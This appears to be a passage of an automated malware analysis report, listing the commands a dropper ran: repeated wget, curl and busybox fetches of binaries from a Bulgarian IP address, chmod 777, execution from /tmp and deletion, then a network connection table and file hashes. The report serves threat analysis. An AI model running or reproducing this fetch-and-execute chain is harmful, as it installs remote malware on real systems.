[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |